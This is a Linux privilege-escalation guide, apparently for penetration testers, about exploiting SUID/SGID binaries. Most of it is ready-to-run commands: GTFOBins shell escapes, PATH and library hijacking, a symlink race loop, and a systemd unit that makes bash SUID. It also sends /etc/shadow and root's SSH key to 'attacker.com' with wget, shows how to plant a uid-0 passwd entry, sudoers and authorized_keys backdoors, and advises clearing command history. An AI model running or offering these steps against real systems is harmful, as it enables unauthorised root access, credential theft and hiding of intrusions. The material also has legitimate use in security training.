SUID/SGID binary exploitation

Understanding SUID/SGID Binaries

What Makes SUID/SGID Dangerous

SUID (Set User ID) and SGID (Set Group ID) binaries are programs that execute with the privileges of their owner or group, rather than the user who runs them. This mechanism allows regular users to perform administrative tasks through trusted programs, but misconfigurations or vulnerable binaries create direct privilege escalation paths.

The Attack Principle: Find SUID/SGID binaries that either:

• Have built-in functionality to spawn shells or execute commands

• Can be abused to read/write files as the binary owner

• Have vulnerabilities that allow arbitrary code execution

• Can be exploited through command injection or path manipulation

Why This Works: When a SUID binary runs, it inherits the privileges of the file owner (usually root), giving attackers a direct escalation path if the binary can be manipulated to execute arbitrary commands.

SUID/SGID Binary Discovery

Finding Elevated Binaries

Basic SUID/SGID Discovery:

# Find all SUID binaries
find / -type f -perm -4000 2>/dev/null

# Find all SGID binaries  
find / -type f -perm -2000 2>/dev/null

# Find both SUID and SGID binaries
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

# More detailed search with file information
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null

Advanced Discovery Techniques:

# Find SUID binaries not owned by root (potentially more vulnerable)
find / -type f -perm -4000 ! -user root 2>/dev/null

# Find SUID binaries in user-writable locations
find / -path /proc -prune -o -type f -perm -4000 -exec ls -la {} \; 2>/dev/null | grep -E "^.......rwx"

# Check for recently modified SUID binaries (potential backdoors)
find / -type f -perm -4000 -newermt "2024-01-01" 2>/dev/null

# Find SUID binaries with unusual names or locations
find / -type f -perm -4000 2>/dev/null | grep -v -E "(bin|sbin)" | head -20

Quick Common Location Check:

# Check standard system directories
ls -la /usr/bin/ | grep "^-r.s"
ls -la /usr/sbin/ | grep "^-r.s" 
ls -la /bin/ | grep "^-r.s"
ls -la /sbin/ | grep "^-r.s"
ls -la /usr/local/bin/ | grep "^-r.s"

GTFOBins Integration

Understanding GTFOBins

GTFOBins (https://gtfobins.github.io/) is the definitive resource for exploiting UNIX binaries for privilege escalation. When you find a SUID binary, immediately check GTFOBins for exploitation techniques.

GTFOBins Categories for SUID Exploitation:

• SUID: Direct privilege escalation through SUID binaries

• Shell: Binaries that can spawn interactive shells

• Command: Binaries that can execute arbitrary commands

• File Read: Binaries that can read files as the owner

• File Write: Binaries that can write files as the owner

Common GTFOBins SUID Exploits

Text Editors and Pagers:

vim/vi (if SUID):

# GTFOBins technique for vim SUID
vim -c ':!/bin/sh'

# Alternative vim techniques
vim
:set shell=/bin/sh
:shell

# Vi technique
vi
:!/bin/sh

nano (if SUID):

# GTFOBins technique for nano
nano
# Press Ctrl+T (opens file browser)
# Type: /bin/sh
# Press Enter

less/more (if SUID):

# GTFOBins technique for less
less /etc/passwd
# Type: !/bin/sh
# Press Enter

# More technique
more /etc/passwd
# Type: !/bin/sh
# Press Enter

Programming Languages and Interpreters:

python (if SUID):

# GTFOBins technique for Python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Alternative Python technique
python -c 'import subprocess; subprocess.call(["/bin/sh"])'

perl (if SUID):

# GTFOBins technique for Perl
perl -e 'exec "/bin/sh";'

# Alternative Perl technique
perl -e 'system("/bin/sh")'

ruby (if SUID):

# GTFOBins technique for Ruby
ruby -e 'exec "/bin/sh"'

# Alternative Ruby technique  
ruby -e 'system("/bin/sh")'

Network and System Tools:

tcpdump (if SUID):

# GTFOBins technique using postrotate-command
echo $'id\ncat /etc/shadow' > /tmp/test
tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test

wget (if SUID):

# GTFOBins technique - can be used to read files
wget --post-file=/etc/shadow http://attacker.com/
wget --post-file=/root/.ssh/id_rsa http://attacker.com/

File Management Tools:

cp (if SUID):

# GTFOBins technique - copy sensitive files
cp /etc/shadow /tmp/shadow_copy
cp /root/.ssh/id_rsa /tmp/root_key

# Overwrite system files (dangerous)
echo "user::0:0:root:/root:/bin/bash" > /tmp/newpasswd
cp /tmp/newpasswd /etc/passwd

tar (if SUID):

# GTFOBins technique for tar
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

# Alternative tar technique
tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'

find (if SUID):

# GTFOBins technique for find
find . -exec /bin/sh -p \; -quit

# Alternative find technique
find / -name "anything" -exec /bin/sh -p \;

Advanced SUID Exploitation Techniques

Binary Analysis and Vulnerability Research

Checking Binary Properties:

# Check binary architecture and properties
file /usr/bin/suspicious_suid
ldd /usr/bin/suspicious_suid

# Check for hardening features
checksec --file=/usr/bin/suspicious_suid 2>/dev/null

# Check binary strings for interesting content
strings /usr/bin/suspicious_suid | grep -E "(system|exec|sh|bash|flag|pass)"

Identifying Custom SUID Binaries:

# List non-standard SUID binaries (likely custom applications)
find / -type f -perm -4000 2>/dev/null | grep -v -E "(su|sudo|passwd|ping|mount|umount|systemctl)"

# Check package ownership (unpackaged binaries are suspicious)
dpkg -S $(find / -type f -perm -4000 2>/dev/null) 2>/dev/null | grep "no path found"
rpm -qf $(find / -type f -perm -4000 2>/dev/null) 2>/dev/null | grep "not owned"

Environment Variable Exploitation

PATH Manipulation for SUID Binaries:

# Check if SUID binary uses system() calls without full paths
strings /usr/bin/vulnerable_suid | grep -E "^[a-z]" | head -10

# Create malicious binary in /tmp
echo '#!/bin/bash' > /tmp/ls
echo '/bin/bash -p' >> /tmp/ls
chmod +x /tmp/ls

# Modify PATH and execute SUID binary
export PATH=/tmp:$PATH
/usr/bin/vulnerable_suid

Library Path Exploitation:

# Check if SUID binary loads libraries from writable locations
ldd /usr/bin/vulnerable_suid

# Create malicious library (if LD_LIBRARY_PATH is honored)
mkdir /tmp/lib
cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/lib/
# Modify library to spawn shell

export LD_LIBRARY_PATH=/tmp/lib:$LD_LIBRARY_PATH
/usr/bin/vulnerable_suid

Race Condition Exploitation

TOCTOU (Time of Check Time of Use) Attacks:

# Create symlink race condition script for vulnerable SUID binary
while true; do
    ln -sf /etc/passwd /tmp/target
    ln -sf /tmp/malicious /tmp/target
done &

# Run vulnerable SUID binary that checks then uses /tmp/target
/usr/bin/vulnerable_suid /tmp/target

Specific Binary Exploitation Examples

Real-World SUID Binary Exploits

systemctl (if SUID - rare but possible):

# GTFOBins technique for systemctl
systemctl status
# Type: !/bin/sh
# Press Enter

# Alternative systemctl technique
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > /tmp/priv.service

systemctl link /tmp/priv.service
systemctl enable --now /tmp/priv.service

docker (if SUID - very dangerous):

# GTFOBins technique for docker
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Alternative docker technique
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu chroot /host bash

env (if SUID):

# GTFOBins technique for env
env /bin/sh -p

# Alternative env technique
env -i /bin/bash --norc --noprofile

awk (if SUID):

# GTFOBins technique for awk
awk 'BEGIN {system("/bin/sh")}'

# Alternative awk technique
awk 'BEGIN {system("id")}'

File Read/Write Exploitation

Reading Sensitive Files via SUID Binaries:

# Using text editors to read protected files
vim /etc/shadow
nano /root/.ssh/id_rsa
less /etc/sudoers

# Using programming languages
python -c "print(open('/etc/shadow').read())"
perl -e 'open(F,"/etc/shadow");print<F>;'
ruby -e 'puts File.read("/etc/shadow")'

# Using system tools
cat /etc/shadow
head -n 20 /etc/shadow
tail -n 20 /root/.ssh/id_rsa

Writing Files via SUID Binaries:

# Adding user to passwd file
vim /etc/passwd
# Add: hacker:$6$salt$hash:0:0:root:/root:/bin/bash

# Adding SSH key to root
vim /root/.ssh/authorized_keys
# Add your public key

# Modifying sudoers file
vim /etc/sudoers
# Add: username ALL=(ALL) NOPASSWD:ALL

SGID Binary Exploitation

Understanding SGID Group Privileges

Common Dangerous SGID Groups:

• shadow: Can read /etc/shadow file

• disk: Can read raw disk devices

• video: Can access framebuffer devices

• audio: Can access audio devices

• docker: Can control Docker daemon

SGID Binary Discovery:

# Find SGID binaries by interesting groups
find / -type f -perm -2000 -group shadow 2>/dev/null
find / -type f -perm -2000 -group disk 2>/dev/null
find / -type f -perm -2000 -group docker 2>/dev/null
find / -type f -perm -2000 -group video 2>/dev/null

Exploiting SGID shadow Group:

# If binary has SGID shadow permissions
find / -type f -perm -2000 -group shadow -exec ls -la {} \; 2>/dev/null

# Common SGID shadow binaries that can be exploited
passwd  # May allow reading shadow file
chage   # Can modify user account aging
expiry  # Can check password expiry

Key Operational Considerations

Success Indicators

• SUID binary executes with elevated privileges

• Effective UID changes to binary owner (check with id)

• File access to previously restricted files

• Command execution with elevated privileges

Common Failure Points

• No SUID binaries present or all are standard system binaries

• Binaries are hardened against command injection

• Restricted environments prevent execution of found binaries

• Modern protections (grsecurity, AppArmor) prevent exploitation

Cleanup Considerations

• Remove created files in /tmp or other writable directories

• Reset PATH variable if modified

• Clear command history if shell access was gained

• Remove temporary scripts used for exploitation

SUID/SGID binary exploitation remains one of the most reliable Linux privilege escalation methods, with GTFOBins providing a comprehensive reference for exploiting nearly any SUID binary encountered in real-world environments.